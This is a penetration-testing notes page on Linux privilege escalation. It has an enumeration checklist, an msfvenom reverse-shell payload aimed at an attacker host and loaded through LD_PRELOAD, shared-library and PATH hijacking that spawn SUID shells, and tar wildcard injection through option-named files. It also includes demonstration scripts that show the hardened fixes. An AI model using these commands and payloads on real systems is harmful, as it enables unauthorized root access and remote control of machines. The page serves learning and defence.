akde/infosec

Information security is ultimately about managing risk


  1. Perform basic system enumeration
  2. Run privilege escalation enumeration scripts
  3. Check running software
    1. Check for exploits for the exact version
    2. Check for config files with sensitive content (credentials, keys)
    3. Check for log output
    4. Check the documentation for useful functions
    5. Check the source code
  4. Try memory investigation (credentials in process memory)
  5. Start the process again with what you learned.

Additional ideas

  • Run pspy to monitor the system (processes and cron jobs become visible without root).
  • If dbus is available, check here and here
  • Compile an escape binary and get a root process to execute it, or have a root process set the SUID bit on it.
  • Analyse all uncommon programs (see Fuzzing)
  • If you want to execute a program but cannot set the executable bit, copy an existing executable with cp (the new file gets the mode of the source file) and then overwrite its content with cat (cat > file truncates the file and keeps its mode). The permissions remain the same.
  • If you can execute a dynamically linked program as another user, get a shell as that user by preloading a library. Caveat: the dynamic loader ignores LD_PRELOAD for set-UID/set-GID binaries (they run in secure mode), so this does not work against a SUID binary directly; it works when something like sudo runs the program for you and keeps LD_PRELOAD in the environment (env_keep).
    1. Create a library payload:
      msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$attackerip LPORT=80 -f elf-so > /tmp/a.so
    2. Load this payload in the program's context (prefix the command with sudo when that is the vector):
      LD_PRELOAD=/tmp/a.so ls

Environment exploitation

  • Analyse binaries with higher privileges: do they try to load a shared library from a directory we control?
    1. Make a list of possible files (SUID/SGID binaries, sudo entries, cron targets).
    2. Check all of them for the libraries they load. strace runs a SUID binary without its privileges, which is fine here, we only want the paths it probes:
      strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file"
    3. Look in the output for a library the binary tries to open at a path that does not exist ("No such file or directory") and whose directory you can write to.
    4. If yes, use escape_lib.c (a shared object whose constructor calls setuid(0)/setgid(0) and spawns a shell), compile it and place the result at the path and name the binary tried to open:
      gcc -shared -fPIC -o escape_lib.so escape_lib.c
    5. Execute the original binary with higher privileges. It now drops a shell.
    6. Remove the exploit so that the program works normally for others.
  • Analyse (with strace, strings, ...) if a binary with higher privileges calls another binary. Check where these binaries are and whether they are called by bare name. If so, put a binary with the same name in a directory you control and prepend that directory to PATH so that your binary is called instead.
    • If the binary is called with its full path, define a bash function with that path as its name and export it; a privileged bash script that inherits your environment then finds the function before the file. This only works with old bash versions, current bash no longer imports function names containing slashes from the environment:
      function /usr/sbin/useradd() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
      export -f /usr/sbin/useradd
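The PATH variant of this, as an added example that is not from the original page: a stand-in for a privileged script that calls useradd by bare name, a fake useradd that only records that it ran, and a check for which PATH directories the current user can write to (the enumeration step before the hijack). Everything runs as the current user in a temporary directory; the privileged_script function, the marker file and the fixed PATH value are assumptions made for the demonstration.

```shell
#!/bin/sh
# Added example, not code from the original page. Shows why a privileged
# script that calls a command by bare name is hijackable through PATH, and
# what a fixed PATH does about it. Runs entirely as the current user.

# Stand-in for a root-run script (assumption for the demo). The bare name
# is resolved through PATH at run time; a real target is found with
# strings/strace on the privileged binary or by reading the script.
privileged_script() {
    useradd --help >/dev/null 2>&1 || :
}

# Build a directory holding a fake useradd that only drops a marker file.
# A real payload would copy bash and set the SUID bit, as on this page.
make_fake_useradd() {
    dir=$(mktemp -d)
    cat > "$dir/useradd" <<EOF
#!/bin/sh
touch "$dir/hijacked"
EOF
    chmod +x "$dir/useradd"
    printf '%s\n' "$dir"
}

# Run the stand-in with our directory prepended to PATH and report whether
# our useradd was the one that executed.
run_with_hijacked_path() {
    dir=$1
    rm -f "$dir/hijacked"
    ( PATH="$dir:$PATH"; export PATH; privileged_script )
    if [ -e "$dir/hijacked" ]; then echo hijacked; else echo untouched; fi
}

# Same script, but PATH is reset to a fixed value first (what a hardened
# script or sudo's secure_path does): our directory is never searched.
run_with_fixed_path() {
    dir=$1
    rm -f "$dir/hijacked"
    ( PATH=/usr/sbin:/usr/bin:/sbin:/bin; export PATH; privileged_script )
    if [ -e "$dir/hijacked" ]; then echo hijacked; else echo untouched; fi
}

# Enumeration helper: print the PATH entries (default: the current PATH)
# the current user can write to. Every hit is a candidate for this hijack.
writable_path_dirs() {
    path=${1:-$PATH}
    oldifs=$IFS
    IFS=:
    for d in $path; do
        [ -d "$d" ] && [ -w "$d" ] && printf '%s\n' "$d"
    done
    IFS=$oldifs
}

# Stand-alone run: report both outcomes and the writable PATH entries.
d=$(make_fake_useradd)
echo "hijacked PATH: $(run_with_hijacked_path "$d")"
echo "fixed PATH:    $(run_with_fixed_path "$d")"
echo "writable PATH entries:"
writable_path_dirs "$d:$PATH"
```

When the privileged process is not a shell script, the same check applies to any library or helper it looks up by name; strace shows the probe order, and the first writable hit in that order wins.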

Wildcard exploitation

Prerequisites:

  • A (script) file is executed with higher privileges (cron, sudo, ...).
  • It contains a command with an unquoted * wildcard.
  • You can write to the directory the wildcard is expanded in.

Then create files in that directory whose names look like options of the program. The shell expands * to the file names before the program starts, and the program parses them as arguments rather than as paths.

Example: Assume there is a call like this in a script:

tar czf /tmp/backup.tar.gz *

The script runs in /home/peter and because we are this user, we can write into this directory. Now,

  1. create a payload file exploit.sh in /home/peter (tar runs it as "sh exploit.sh" from its working directory, so it needs no execute bit), and
  2. create empty files that are named after the tar options which execute it:
    touch -- /home/peter/--checkpoint=1
    touch -- '/home/peter/--checkpoint-action=exec=sh exploit.sh'

The next privileged run of the script executes exploit.sh. On the defending side the fix is to end option parsing with -- (tar czf /tmp/backup.tar.gz -- *) or to write the glob as ./* so that no expansion can start with a dash.
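The tar case above, reproduced end to end as an added example that is not from the original page: it builds a throwaway directory with the two option-named files, shows what the unquoted * actually hands to tar, runs the vulnerable invocation as the current user and checks whether the checkpoint action executed the payload, then runs the hardened invocation with -- for comparison. The directory, the marker file "pwned" and the one-line exploit.sh are constructed here; the vulnerable run needs GNU tar, since BusyBox and BSD tar do not know --checkpoint.

```shell
#!/bin/sh
# Added example, not code from the original page. Reproduces the tar
# wildcard injection in a temp directory as the current user and shows
# the invocation that is not affected.

# Build the directory the "privileged" script globs over. Two file names
# look like tar options; when the script runs `tar czf out *`, the shell
# expands * and tar receives them as options, not as paths to archive.
setup_wildcard_dir() {
    dir=$(mktemp -d)
    printf 'real data\n' > "$dir/data.txt"
    # The checkpoint action runs `sh exploit.sh` from tar's working
    # directory; this payload only drops a marker file (constructed here).
    printf 'touch "%s/pwned"\n' "$dir" > "$dir/exploit.sh"
    touch -- "$dir/--checkpoint=1"
    touch -- "$dir/--checkpoint-action=exec=sh exploit.sh"
    printf '%s\n' "$dir"
}

# Show what the unquoted glob actually hands to the command, one argument
# per line: the option-looking names are indistinguishable from real ones.
expanded_args() {
    ( cd "$1" && set -- * && printf '%s\n' "$@" )
}

# The call from the page, run as the current user. If tar executed our
# payload, the marker exists afterwards. GNU tar only; other tars fail on
# the unknown option instead of executing anything.
vulnerable_backup() {
    dir=$1
    rm -f "$dir/pwned"
    ( cd "$dir" && tar czf "$dir.tar.gz" * ) >/dev/null 2>&1 || :
    if [ -e "$dir/pwned" ]; then echo exploited; else echo safe; fi
}

# Hardened form: `--` ends option parsing, so every expansion of * is a
# path. Writing `./*` instead of `*` achieves the same.
hardened_backup() {
    dir=$1
    rm -f "$dir/pwned"
    ( cd "$dir" && tar czf "$dir-safe.tar.gz" -- * ) >/dev/null 2>&1 || :
    if [ -e "$dir/pwned" ]; then echo exploited; else echo safe; fi
}

# Stand-alone run.
d=$(setup_wildcard_dir)
echo "arguments tar receives:"
expanded_args "$d"
echo "vulnerable run: $(vulnerable_backup "$d")"
echo "hardened run:   $(hardened_backup "$d")"
```

The same pattern applies to other tools with option-like side effects reachable from a file name (rsync -e, chown --reference, and any program that spawns a shell from an option); the check is always the same: does the privileged command expand a wildcard in a directory you can write to, and does it parse options after positional arguments.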

Ideas of despair

  • Some applications no longer work, but an old version may. Try an older attacking machine or an older version of previously tried software.
  • If your user has multiple groups:
    • use id to show the current groups
    • use newgrp $othergroup to start a shell with that group as your primary group
    • repeat id

Upgrade to an interactive shell

python -c 'import pty;pty.spawn("/bin/bash")'

python3 -c 'import pty;pty.spawn("/bin/bash")'